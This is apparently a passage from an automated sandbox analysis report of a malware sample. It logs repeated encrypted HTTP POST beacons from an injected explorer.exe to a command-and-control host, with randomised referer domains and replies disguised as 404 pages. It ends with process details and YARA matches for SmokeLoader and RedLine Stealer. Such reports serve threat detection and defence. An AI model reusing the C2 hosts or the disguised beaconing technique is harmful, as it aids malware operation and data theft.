                                                                    34192.168.2.650019125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:03:34.564255953 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://wrowxfwdtnqpxb.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 187
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:03:34.564279079 CEST187OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 66 5b fc fa
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[+k,vuf[SG\eHkqi\qzllg*(l^_4D%&EKR5X/ 2NWzD/*,3
                                                                    Oct 14, 2024 06:03:36.144678116 CEST484INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:03:35 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    35192.168.2.650023125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:04:43.891976118 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://shukyhyxsnyt.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 213
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:04:43.891976118 CEST213OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 58 19 f0 b8
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vuXz$MnQu(O\+`Q[,CIu:M8&2bSLQP[Um80m
                                                                    Oct 14, 2024 06:04:45.418653011 CEST151INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:04:45 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    36192.168.2.650024125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:04:49.589613914 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://oytavkgbvwgngwdq.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 192
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:04:49.589648962 CEST192OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 32 2f ce a1
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vu2/a'OyZ<uqT+$qWB,WLJ(#X Y_cd_$*xV3^};P<
                                                                    Oct 14, 2024 06:04:51.149257898 CEST151INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:04:50 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    37192.168.2.650025125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:04:56.730218887 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://qcthmhytlnkrqkwa.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 358
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:04:56.730258942 CEST358OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 44 53 b4 e6
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vuDSifky?p'ye=a<=l%RL]25~wMQs'H{6@Y!;K y#DXtS-E9f
                                                                    Oct 14, 2024 06:04:58.244179964 CEST151INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:04:57 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    38192.168.2.650026125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:05:02.506752014 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://irmipcatkrgbgkn.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 295
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:05:02.506829977 CEST295OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 79 49 ff fc
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vuyI(FWvn_S!m-9$<)eHOAi%ZGd2}ta(i9n)g^'!?L*leX@NJY0'
                                                                    Oct 14, 2024 06:05:04.062722921 CEST151INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:05:03 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    39192.168.2.650027125.7.253.10804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:05:08.613362074 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://cxjsppdhykfhkdy.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 178
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:05:08.613362074 CEST178OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4e 3e f3 a8
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vuN>X9v\ch2UUB1XbJ;d'l4$G0==R]^S2;d[D
                                                                    Oct 14, 2024 06:05:10.088608027 CEST151INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:05:09 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    40192.168.2.650028211.171.233.129804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:05:16.547518969 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://wmcfxulhyyb.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 151
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:05:16.547554970 CEST151OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 45 5f b6 a0
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vuE_Mkz}jzH^q=oT51l'!9V!Z\:!
                                                                    Oct 14, 2024 06:05:18.034732103 CEST151INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:05:17 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    41192.168.2.650030211.171.233.129804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:05:22.429583073 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://nhfvlqknfjyv.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 188
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:05:22.429619074 CEST188OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 04 b8 8e
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vu1MNsBW'+VLG5^2jfF]VZ8}~LF2^Edv/<RxF
                                                                    Oct 14, 2024 06:05:24.004805088 CEST151INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:05:23 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    42192.168.2.650031211.171.233.129804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:05:30.250528097 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://kdpqwaweroenq.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 200
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:05:30.250555038 CEST200OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 5b df 89
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vu)[W3eE`e!\2y{^<fKvq6^aB=ij'&:dkU?X\[u+J
                                                                    Oct 14, 2024 06:05:31.785276890 CEST151INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:05:31 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    43192.168.2.650032211.171.233.129804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:05:36.023633003 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://qymlmmmarfrlf.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 203
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:05:36.023652077 CEST203OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 64 4c de e1
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vudLNn|'ZNUf<oBMwNsP@}TPZ&F?q w) |nRA
                                                                    Oct 14, 2024 06:05:37.619925022 CEST151INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:05:37 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    44192.168.2.650033211.171.233.129804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:05:42.127414942 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://sjchoqywbhy.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 126
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:05:42.127444983 CEST126OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3e 2d bc fa
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vu>-]KawFsvh1*0nG~j
                                                                    Oct 14, 2024 06:05:43.752674103 CEST151INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:05:43 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    45192.168.2.650034211.171.233.129804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:05:47.919637918 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://lfpsmslcgfbr.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 223
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:05:47.919661045 CEST223OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 72 0f fa fc
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vurJMgZN7Ua?!sfE[_V9B%Y '>AI@$W6vJVjRn|TL8p}e
                                                                    Oct 14, 2024 06:05:49.450983047 CEST151INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:05:49 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    46192.168.2.650035211.171.233.129804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:05:53.119637966 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://vpqrqumkciggjbf.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 332
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:05:53.119656086 CEST332OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 66 58 e8 b8
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vufX*Q}PSEQ'="WN`sHR5`u>];1N`];AS@')>`(~EX}UX^$Mo}c_;
                                                                    Oct 14, 2024 06:05:55.638432980 CEST151INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:05:55 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    47192.168.2.650036211.171.233.129804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:05:59.062105894 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://yprnusgmnhodqa.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 134
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:05:59.062125921 CEST134OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2e 19 df ad
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vu.YiD}V4C|5<8?R~td
                                                                    Oct 14, 2024 06:06:00.592765093 CEST151INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:06:00 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    48192.168.2.650037211.171.233.129804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:06:04.583408117 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://hwgseaeonxo.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 199
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:06:04.583408117 CEST199OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 25 41 eb 9c
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vu%AHz\N.PW@;{}#.}r8 NGhB)WHxH.Vh}|^<E:
                                                                    Oct 14, 2024 06:06:06.826704979 CEST151INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:06:05 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r
                                                                    Oct 14, 2024 06:06:06.826754093 CEST151INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:06:05 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r
                                                                    Oct 14, 2024 06:06:06.826762915 CEST151INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:06:05 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    49192.168.2.650038211.171.233.129804004C:\Windows\explorer.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 14, 2024 06:06:11.776343107 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://lxdpanclboemkjpp.org/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 178
                                                                    Host: nwgrus.ru
                                                                    Oct 14, 2024 06:06:11.776376009 CEST178OUTData Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 32 24 c4 88
                                                                    Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vu2$+@bZ_n6qg8ec("l6EF,v2P om:/MBgKE(
                                                                    Oct 14, 2024 06:06:13.269507885 CEST151INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Mon, 14 Oct 2024 04:06:12 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    Data Raw: 03 00 00 00 72 e8 84
                                                                    Data Ascii: r


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:00:02:07
                                                                    Start date:14/10/2024
                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                    Imagebase:0x400000
                                                                    File size:274'944 bytes
                                                                    MD5 hash:29EAF4B051758C9946539B6BA8AA475F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2253666122.0000000004A91000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2253666122.0000000004A91000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2253380086.0000000002C1D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2253563669.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2253580579.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
